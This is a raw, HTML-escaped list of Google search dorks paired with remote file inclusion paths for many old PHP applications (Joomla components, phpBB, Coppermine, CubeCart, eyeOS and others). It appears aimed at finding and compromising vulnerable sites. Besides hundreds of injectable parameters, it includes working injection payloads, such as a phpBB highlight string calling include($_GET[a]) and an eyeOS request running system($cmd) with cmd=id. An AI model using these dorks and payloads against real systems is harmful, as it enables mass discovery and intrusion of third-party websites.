/&gt;includes/include_once.php?include_file=&lt;br /&gt;modules.php?name=jokeid=&lt;br /&gt;index.php?site=&lt;br /&gt;livehelp/inc/pipe.php?HCL_path=&lt;br /&gt;hcl/inc/pipe.php?HCL_path=&lt;br /&gt;support/faq/inc/pipe.php?HCL_path=&lt;br /&gt;help/faq/inc/pipe.php?HCL_path=&lt;br /&gt;helpcenter/inc/pipe.php?HCL_path=&lt;br /&gt;live-support/inc/pipe.php?HCL_path=&lt;br /&gt;gnu3/index.php?doc=&lt;br /&gt;gnu/index.php?doc=&lt;br /&gt;phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;includes/calendar.php?phpc_root_path=&lt;br /&gt;includes/setup.php?phpc_root_path=&lt;br /&gt;inc/authform.inc.php?path_pre=&lt;br /&gt;include/authform.inc.php?path_pre=&lt;br /&gt;web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;web_statistics//tools/send_reminders.php?includedir=&lt;br /&gt;web_statistics//include/write.php?dir=&lt;br /&gt;web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;web_statistics//calendar/tools/send_reminders.php?includedir=&lt;br /&gt;web_statistics//skin/zero_vote/error.php?dir=&lt;br /&gt;web_statistics//coppercop/theme.php?THEME_DIR=&lt;br /&gt;includes/header.php?systempath=&lt;br /&gt;Gallery/displayCategory.php?basepath=&lt;br /&gt;index.inc.php?PATH_Includes=&lt;br /&gt;nphp/nphpd.php?nphp_config[LangFile]=&lt;br /&gt;ashheadlines.php?pathtoashnews=&lt;br /&gt;demo/includes/init.php?user_inc=&lt;br /&gt;jaf/index.php?show=&lt;br /&gt;inc/shows.inc.php?cutepath=&lt;br /&gt;poll/admin/common.inc.php?base_path=&lt;br /&gt;sources/post.php?fil_config=&lt;br /&gt;bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;include/livre_include.php?chem_absolu=&lt;br /&gt;index.php?pageurl=&lt;br /&gt;derniers_commentaires.php?rep=&lt;br /&gt;modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;agendax/addevent.inc.php?agendax_path=&lt;br /&gt;main.php?page=&lt;br /&gt;default.php?page=&lt;br /&gt;index.php?action=&lt;br /&gt;index1.php?p=&lt;br /&gt;index2.php?x=&lt;br /&gt;index2.php?content=&lt;br /&gt;index.php?conteudo=&lt;br /&gt;GradeMap/index.php?page=&lt;br /&gt;phpopenchat/contrib/yabbse/poc.php?sourcedir=&lt;br /&gt;calendar/calendar.php?serverPath=&lt;br /&gt;calendar/functions/popup.php?serverPath=&lt;br /&gt;calendar/events/header.inc.php?serverPath=&lt;br /&gt;calendar/events/datePicker.php?serverPath=&lt;br /&gt;calendar/setup/setupSQL.php?serverPath=&lt;br /&gt;calendar/setup/header.inc.php?serverPath=&lt;br /&gt;install/index.php?G_PATH=&lt;br /&gt;support/mailling/maillist/inc/initdb.php?absolute_path=&lt;br /&gt;coppercop/theme.php?THEME_DIR=&lt;br /&gt;dotproject/modules/projects/addedit.php?root_dir=&lt;br /&gt;dotproject/modules/projects/view.php?root_dir=&lt;br /&gt;dotproject/modules/projects/vw_files.php?root_dir=&lt;br /&gt;dotproject/modules/tasks/addedit.php?root_dir=&lt;br /&gt;dotproject/modules/tasks/viewgantt.php?root_dir=&lt;br /&gt;My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;index.php?meio.php=&lt;br /&gt;index.php?configFile=&lt;br /&gt;index.php?do=&lt;br /&gt;phpshop/index.php?base_dir=&lt;br /&gt;contacts.php?cal_dir=&lt;br /&gt;convert-date.php?cal_dir=&lt;br /&gt;album_portal.php?phpbb_root_path=&lt;br /&gt;mainfile.php?MAIN_PATH=&lt;br /&gt;html/affich.php?base=&lt;br /&gt;gallery/init.php?HTTP_POST_VARS=&lt;br /&gt;ideabox/include.php?gorumDir=&lt;br /&gt;stats/modules/My_eGallery/index.php?basepath=&lt;br /&gt;stats/include/write.php?dir=&lt;br /&gt;stats/tools/send_reminders.php?includedir=&lt;br /&gt;index.cgiupgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;pollvote/pollvote.php?pollname&lt;br /&gt;includes/page_header.php?dir=&lt;br /&gt;index2.php?mosConfig_absolute_path=&lt;br /&gt;new/bbs//include/write.php?dir=&lt;br /&gt;index.php?mosConfig_absolute_path=&lt;br /&gt;modules/My_eGallery/public/inc/?HCL_path=&lt;br /&gt;/forum/auth/auth.php?phpbb_root_path=&lt;br /&gt;/forum/auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;/cutenews/comments.php?cutepath=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/impex/ImpExData.php?systempath=&lt;br /&gt;/coppermine/thumbnails.php?lang=&lt;br /&gt;/gallery/thumbnails.php?lang=&lt;br /&gt;/aWebNews/visview.php?path_to_news=&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;/4images/index.php?template=&lt;br /&gt;/galeri/index.php?template=&lt;br /&gt;/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=&lt;br /&gt;/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=&lt;br /&gt;/components/com_simpleboard/image_upload.php?sbp=&lt;br /&gt;/gallery/index.php?template=&lt;br /&gt;/auth/auth.php?phpbb_root_path=&lt;br /&gt;/auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/index.php?phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/admin_avatar.php?phpbb_root_path=&lt;br /&gt;/modules/Forums/admin/admin_styles.php?phpbb_root_path=&lt;br /&gt;/_wk/wk_lang.php?wkPath=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&lt;br /&gt;/modules/Forums/admin/admin_board.php?phpEx=&lt;br /&gt;/modules/Forums/admin/admin_users.php?phpEx=&lt;br /&gt;/library/editor/editor.php?root=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/modules/My_eGallery/index.php?basepath=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/phpBB/admin/admin_styles.php?mode=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/index.php?page=&lt;br /&gt;/index.php?pag=&lt;br /&gt;/index.php?sayfa=&lt;br /&gt;/index.php?pg=&lt;br /&gt;/index.php?include=&lt;br /&gt;/index.php?content=&lt;br /&gt;/index.php?p=&lt;br /&gt;/index.php?s=&lt;br /&gt;/index.php?cont=&lt;br /&gt;/index.php?c=&lt;br /&gt;/journal.php?m=&lt;br /&gt;/index.php?m=&lt;br /&gt;/links.php?c=&lt;br /&gt;/forums.php?m=&lt;br /&gt;/list.php?c=&lt;br /&gt;/journal.php?m=&lt;br /&gt;/user.php?xoops_redirect=&lt;br /&gt;/index.php?id= &lt;br /&gt;inurl:/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;inurl:/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;inurl:/_functions.php?prefix=&lt;br /&gt;inurl:/cpcommerce/_functions.php?prefix=&lt;br /&gt;inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;inurl:/ashnews.php?pathtoashnews=&lt;br /&gt;inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=&lt;br /&gt;inurl:/pm/lib.inc.php?pm_path=&lt;br /&gt;inurl:/b2-tools/gm-2-b2.php?b2inc=&lt;br /&gt;inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;inurl:/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;inurl:/includes/include_once.php?include_file=&lt;br /&gt;inurl:/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;inurl:/shoutbox/expanded.php?conf=&lt;br /&gt;inurl:/main.php?x=&lt;br /&gt;inurl:/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;inurl:/index.php/main.php?x=&lt;br /&gt;inurl:/index.php?include=&lt;br /&gt;inurl:/index.php?x=&lt;br /&gt;inurl:/index.php?open=&lt;br /&gt;inurl:/index.php?visualizar=&lt;br /&gt;inurl:/template.php?pagina=&lt;br /&gt;inurl:/index.php?pagina=&lt;br /&gt;inurl:/index.php?inc=&lt;br /&gt;inurl:/includes/include_onde.php?include_file=&lt;br /&gt;inurl:/index.php?page=&lt;br /&gt;inurl:/index.php?pg=&lt;br /&gt;inurl:/index.php?show=&lt;br /&gt;inurl:/index.php?cat=&lt;br /&gt;inurl:/index.php?file=&lt;br /&gt;inurl:/db.php?path_local=&lt;br /&gt;inurl:/index.php?site=&lt;br /&gt;inurl:/htmltonuke.php?filnavn=&lt;br /&gt;inurl:/livehelp/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/hcl/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/support/faq/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/help/faq/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/helpcenter/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/live-support/inc/pipe.php?HCL_path=&lt;br /&gt;inurl:/gnu3/index.php?doc=&lt;br /&gt;inurl:/gnu/index.php?doc=&lt;br /&gt;inurl:/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;inurl:/forum/install.php?phpbb_root_dir=&lt;br /&gt;inurl:/includes/calendar.php?phpc_root_path=&lt;br /&gt;inurl:/includes/setup.php?phpc_root_path=&lt;br /&gt;inurl:/inc/authform.inc.php?path_pre=&lt;br /&gt;inurl:/include/authform.inc.php?path_pre=&lt;br /&gt;inurl:index.php?nic=&lt;br /&gt;inurl:index.php?sec=&lt;br /&gt;inurl:index.php?content=&lt;br /&gt;inurl:index.php?link=&lt;br /&gt;inurl:index.php?filename=&lt;br /&gt;inurl:index.php?dir=&lt;br /&gt;inurl:index.php?document=&lt;br /&gt;inurl:index.php?view=&lt;br /&gt;inurl:*.php?sel=&lt;br /&gt;inurl:*.php?session=&amp;content=&lt;br /&gt;inurl:*.php?locate=&lt;br /&gt;inurl:*.php?place=&lt;br /&gt;inurl:*.php?layout=&lt;br /&gt;inurl:*.php?go=&lt;br /&gt;inurl:*.php?catch=&lt;br /&gt;inurl:*.php?mode=&lt;br /&gt;inurl:*.php?name=&lt;br /&gt;inurl:*.php?loc=&lt;br /&gt;inurl:*.php?f=&lt;br /&gt;inurl:*.php?inf=&lt;br /&gt;inurl:*.php?pg=&lt;br /&gt;inurl:*.php?load=&lt;br /&gt;inurl:*.php?naam=&lt;br /&gt;allinurl:/index.php?page= site:*.dk&lt;br /&gt;allinurl:/index.php?file= site:*.dk&lt;br /&gt;&lt;br /&gt;INURL OR ALLINURL WITH:&lt;br /&gt;&lt;br /&gt;/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=&lt;br /&gt;/includes/header.php?systempath=&lt;br /&gt;/Gallery/displayCategory.php?basepath=&lt;br /&gt;/index.inc.php?PATH_Includes=&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;/ashheadlines.php?pathtoashnews=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/demo/includes/init.php?user_inc=&lt;br /&gt;/jaf/index.php?show=&lt;br /&gt;/inc/shows.inc.php?cutepath=&lt;br /&gt;/poll/admin/common.inc.php?base_path=&lt;br /&gt;/pollvote/pollvote.php?pollname=&lt;br /&gt;/sources/post.php?fil_config=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;/include/livre_include.php?no_connect=lol&amp;chem_absolu=&lt;br /&gt;/index.php?from_market=Y&amp;pageurl=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/derniers_commentaires.php?rep=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/main.php?page=&lt;br /&gt;/default.php?page=&lt;br /&gt;/index.php?action=&lt;br /&gt;/index1.php?p=&lt;br /&gt;/index2.php?x=&lt;br /&gt;/index2.php?content=&lt;br /&gt;/index.php?conteudo=&lt;br /&gt;/index.php?cat=&lt;br /&gt;/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/library/editor/editor.php?root=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;/zentrack/index.php?configFile=&lt;br /&gt;/main.php?x=&lt;br /&gt;/becommunity/community/index.php?pageurl=&lt;br /&gt;/GradeMap/index.php?page=&lt;br /&gt;/index4.php?body=&lt;br /&gt;/side/index.php?side=&lt;br /&gt;/main.php?page=&lt;br /&gt;/es/index.php?action=&lt;br /&gt;/index.php?sec=&lt;br /&gt;/index.php?main=&lt;br /&gt;/index.php?sec=&lt;br /&gt;/index.php?menu=&lt;br /&gt;/html/page.php?page=&lt;br /&gt;/page.php?view=&lt;br /&gt;/index.php?menu=&lt;br /&gt;/main.php?view=&lt;br /&gt;/index.php?page=&lt;br /&gt;/content.php?page=&lt;br /&gt;/main.php?page=&lt;br /&gt;/index.php?x=&lt;br /&gt;/main_site.php?page=&lt;br /&gt;/index.php?L2=&lt;br /&gt;/content.php?page=&lt;br /&gt;/main.php?page=&lt;br /&gt;/index.php?x=&lt;br /&gt;/main_site.php?page=&lt;br /&gt;/index.php?L2=&lt;br /&gt;/index.php?show=&lt;br /&gt;/tutorials/print.php?page=&lt;br /&gt;/index.php?page=&lt;br /&gt;/index.php?level=&lt;br /&gt;/index.php?file=&lt;br /&gt;/index.php?inter_url=&lt;br /&gt;/index.php?page=&lt;br /&gt;/index2.php?menu=&lt;br /&gt;/index.php?level=&lt;br /&gt;/index1.php?main=&lt;br /&gt;/index1.php?nav=&lt;br /&gt;/index1.php?link=&lt;br /&gt;/index2.php?page=&lt;br /&gt;/index.php?myContent=&lt;br /&gt;/index.php?TWC=&lt;br /&gt;/index.php?sec=&lt;br /&gt;/index1.php?main=&lt;br /&gt;/index2.php?page=&lt;br /&gt;/index.php?babInstallPath=&lt;br /&gt;/main.php?body=&lt;br /&gt;/index.php?z=&lt;br /&gt;/main.php?view=&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;/index.php?file=&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;1. allinurl:my_egallery site:.org&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;2. allinurl:xgallery site:.org&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;3. allinurl:coppermine site:.org&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;4. allinurl:4nAlbum site:.org&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;5. allinurlP:NphpBB2 site:.org&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&lt;br /&gt;6. allinurl:ihm.php?p=&lt;br /&gt;7. Keyword : "powered by AllMyLinks"&lt;br /&gt;/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;8. allinurl:/modules.php?name=allmyguests&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;9. allinurl:/Popper/index.php?&lt;br /&gt;/Popper/index.php?childwindow.inc.php?form=&lt;br /&gt;&lt;br /&gt;10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php&lt;br /&gt;yahoo = by Kietu? v 3.2&lt;br /&gt;/kietu/index.php?kietu[url_hit]=&lt;br /&gt;&lt;br /&gt;11. keyword : "Powered by phpBB 2.0.6"&lt;br /&gt;/html&amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;a=&lt;br /&gt;&lt;br /&gt;12. keyword : "powered by CubeCart 3.0.6"&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&lt;br /&gt;&lt;br /&gt;13. keyword : "powered by paBugs 2.0 Beta 3"&lt;br /&gt;/class.mysql.php?path_to_bt_dir=&lt;br /&gt;&lt;br /&gt;14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;&lt;br /&gt;15. keyword : /phorum/login.php&lt;br /&gt;/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&lt;br /&gt;&lt;br /&gt;16. allinurl:ihm.php?p=*&lt;br /&gt;&lt;br /&gt;14. keyword : "powered eyeOs"&lt;br /&gt;/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&amp;cmd=id&lt;br /&gt;diganti dengan :&lt;br /&gt;/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&amp;a=&lt;br /&gt;&lt;br /&gt;15. allinurl:.php?bodyfile=&lt;br /&gt;&lt;br /&gt;16. allinurl:/includes/orderSuccess.inc.php?glob=&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=&lt;br /&gt;&lt;br /&gt;17. allinurl:forums.html&lt;br /&gt;/modules.php?name=&lt;br /&gt;&lt;br /&gt;18. allinurl:/default.php?page=home&lt;br /&gt;&lt;br /&gt;19. allinurl:/folder.php?id=&lt;br /&gt;&lt;br /&gt;20. allinurl:main.php?pagina=&lt;br /&gt;/paginedinamiche/main.php?pagina=&lt;br /&gt;&lt;br /&gt;21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;22. allinurl:application.php?base_path=&lt;br /&gt;/application.php?base_path=&lt;br /&gt;&lt;br /&gt;23. allinurlp:hplivehelper&lt;br /&gt;/phplivehelper/initiate.php?abs_path=&lt;br /&gt;&lt;br /&gt;24. allinurlp:hpnuke&lt;br /&gt;/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=&lt;br /&gt;&lt;br /&gt;25. key word : "powered by Fantastic News v2.1.2"&lt;br /&gt;/archive.php?CONFIG[script_path]=&lt;br /&gt;&lt;br /&gt;26. keyword: "powered by smartblog" AND inurl:?page=login&lt;br /&gt;/index.php?page=&lt;br /&gt;&lt;br /&gt;27. allinurl:/forum/&lt;br /&gt;/forum/admin/index.php?inc_conf=&lt;br /&gt;&lt;br /&gt;28. keyword:"Powered By FusionPHP"&lt;br /&gt;/templates/headline_temp.php?nst_inc=&lt;br /&gt;&lt;br /&gt;29. allinurl:shoutbox/expanded.php filetypep:hp&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;&lt;br /&gt;30. allinurl: /osticket/&lt;br /&gt;/osticket/include/main.php?config[search_disp]=true&amp;include_dir=&lt;br /&gt;&lt;br /&gt;31. keyword : "Powered by iUser"&lt;br /&gt;/common.php?include_path=&lt;br /&gt;&lt;br /&gt;32. allinurl: "static.php?load="&lt;br /&gt;/static.php?load=&lt;br /&gt;&lt;br /&gt;33. keyworld : /phpcoin/login.php&lt;br /&gt;/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=&lt;br /&gt;&lt;br /&gt;34. keyworld: allinurl:/phpGedview/login.php site:&lt;br /&gt;/help_text_vars.php?dir&amp;PGV_BASE_DIRECTORY=&lt;br /&gt;&lt;br /&gt;35. allinurl:/folder.php?id=&lt;br /&gt;/classes.php?LOCAL_PATH=&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;inurl:"/lire.php?rub="&lt;br /&gt;inurl:"/os/pointer.php?url="&lt;br /&gt;inurl:"folder.php?id="&lt;br /&gt;inurl:"show.php?page="&lt;br /&gt;inurl:"index2.php?DoAction="&lt;br /&gt;inurl:"index.php?canal="&lt;br /&gt;inurl:"index.php?screen="&lt;br /&gt;inurl:"index.php?langc="&lt;br /&gt;inurl:"index.php?Language="&lt;br /&gt;inurl:"view.php?page="&lt;br /&gt;dork: "powered by doodle cart"&lt;br /&gt;rfi of this dork: enc/content.php?Home_Path=&lt;br /&gt;&lt;br /&gt;dork: "Login to Calendar"&lt;br /&gt;rfi of this dork: /embed/day.php?path=&lt;br /&gt;&lt;br /&gt;dork: "powered by EQdkp"&lt;br /&gt;rfi of this dork: /includes/dbal.php?eqdkp_root_path=&lt;br /&gt;inurl:"template.php?goto="&lt;br /&gt;&lt;br /&gt;inurl:"video.php?content="&lt;br /&gt;inurl:"pages.php?page="&lt;br /&gt;inurl:"index1.php?choix="&lt;br /&gt;inurl:"index1.php?menu="&lt;br /&gt;inurl:"index2.php?ascii_seite="&lt;br /&gt;dork: inurl:surveys&lt;br /&gt;rfi to this dork: /surveys/survey.inc.php?path=&lt;br /&gt;inurl:"index.php?body="&lt;br /&gt;dork: allinurl:adobt sitel&lt;br /&gt;rfi to this dork: /classes/adodbt/sql.php?classes_dir=&lt;br /&gt;&lt;br /&gt;dork: "Powered By ScozNews"&lt;br /&gt;rfi to this dork: /sources/functions.php?CONFIG[main_path]=&lt;br /&gt;rfi to this dork: /sources/template.php?CONFIG[main_path]=&lt;br /&gt;&lt;br /&gt;inurl:"kb_constants.php?module_root_path="&lt;br /&gt;&lt;br /&gt;dork: allinurl:"mcf.php"&lt;br /&gt;rfi to this dork: /mcf.php?content=&lt;br /&gt;&lt;br /&gt;dork: inurl:"main.php?sayfa="&lt;br /&gt;rfi to this dork: /main.php?sayfa=&lt;br /&gt;&lt;br /&gt;dork: "MobilePublisherPHP"&lt;br /&gt;rfi to this dork: /header.php?abspath=&lt;br /&gt;&lt;br /&gt;dork: "powered by phpCOIN 1.2.3"&lt;br /&gt;rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&lt;br /&gt;allinurl:login.php?dir=&lt;br /&gt;inurl:"index.php?go="&lt;br /&gt;inurl:"index1.php?="&lt;br /&gt;inurl:"lib/gore.php?libpath="&lt;br /&gt;iurl:"index2.php?p=" &lt;br /&gt;/surveys/survey.inc.php?path= inurl:surveys&lt;br /&gt;index.php?body= inurl:"index.php?body="&lt;br /&gt;/classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl&lt;br /&gt;enc/content.php?Home_Path= "powered by doodle cart"&lt;br /&gt;/classified_right.php?language_dir= inurl:classified.php phpbazar&lt;br /&gt;/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"&lt;br /&gt;/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"&lt;br /&gt;/embed/day.php?path= intitle:"Login to Calendar"&lt;br /&gt;/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"&lt;br /&gt;/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"&lt;br /&gt;/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"&lt;br /&gt;/mcf.php?content= allinurl:"mcf.php" site:.de&lt;br /&gt;/components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:"com_facileforms" site:.ar&lt;br /&gt;skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&lt;br /&gt;/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6"&lt;br /&gt;/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:"com_serverstat"&lt;br /&gt;/components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:"index.php?option="com_zoom"&lt;br /&gt;/main.php?sayfa= inurl:"main.php?sayfa="&lt;br /&gt;/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration&lt;br /&gt;/addpost_newpoll.php?addpoll=preview&amp;thispath= allinurl:"/ubbthreads/"&lt;br /&gt;/header.php?abspath= "MobilePublisherPHP"&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository&lt;br /&gt;impex/ImpExData.php?systempath= intext:powered by vbulletin&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com&lt;br /&gt;/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository&lt;br /&gt;/tools/send_reminders.php?includedir= allinurl:day.php?date=&lt;br /&gt;/skin/zero_vote/error.php?dir= skin/zero_vote/error.php&lt;br /&gt;/modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar&lt;br /&gt;/login.php?dir= allinurl:login.php?dir=&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php&lt;br /&gt;index.php?pageurl= inurl:"index.php?pageurl=*.php"&lt;br /&gt;/templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system&lt;br /&gt;index.php?var= inurl:"index.php?var=*.php"&lt;br /&gt;index.php?pagina= inurl:"index.php?pagina=*.php"&lt;br /&gt;index.php?go= inurl:"index.php?go="&lt;br /&gt;index.php?site= inurl:"index.php?site="&lt;br /&gt;phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:"phpwcms/index.php?id="&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:".com.*/index.php?option=com_comprofiler"&lt;br /&gt;index.php?pagina= inurl:"index.php?pagina=*.php"&lt;br /&gt;index.php?id= inurl:"index.php?id=*.php"&lt;br /&gt;index1.php?= inurl:"index1.php?=*.php?&lt;br /&gt;index.php?site= inurl:"index.php?site=*.php"&lt;br /&gt;main.php?id= inurl:"main.php?id=*.php"&lt;br /&gt;content.php?page= inurl:"content.php?page=*.php"&lt;br /&gt;admin.php?page= inurl:"admin.php?page=*.php"&lt;br /&gt;lib/gore.php?libpath= inurl:"/SQuery/"&lt;br /&gt;SQuery/lib/gore.php?libpath= inurl:"/SQuery/"&lt;br /&gt;index2.php?p= inurl:"index2.php?p=*.php"&lt;br /&gt;index1.php?go= inurl:"index1.php?go=*.php"&lt;br /&gt;news_detail.php?file= inurl:"news_detail.php?file=*.php"&lt;br /&gt;old_reports.php?file= inurl:"old_reports.php?file=*.php"&lt;br /&gt;index.php?x= inurl:"index.php?x=*.php"&lt;br /&gt;index.php?nic= inurl:"index.php?nic=*.php"&lt;br /&gt;homepage.php?sel= inurl:"homepage.php?sel=*.php"&lt;br /&gt;index.php?sel= inurl:"index.php?sel=*.php"&lt;br /&gt;main.php?x= inurl:"main.php?x=*.php"&lt;br /&gt;components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= "inurl:com_artlinks"&lt;br /&gt;index2.php?x= inurl:index2.php?x=*.php"&lt;br /&gt;main.php?pagina= inurl:"main.php?pagina=*.php"&lt;br /&gt;test.php?page= 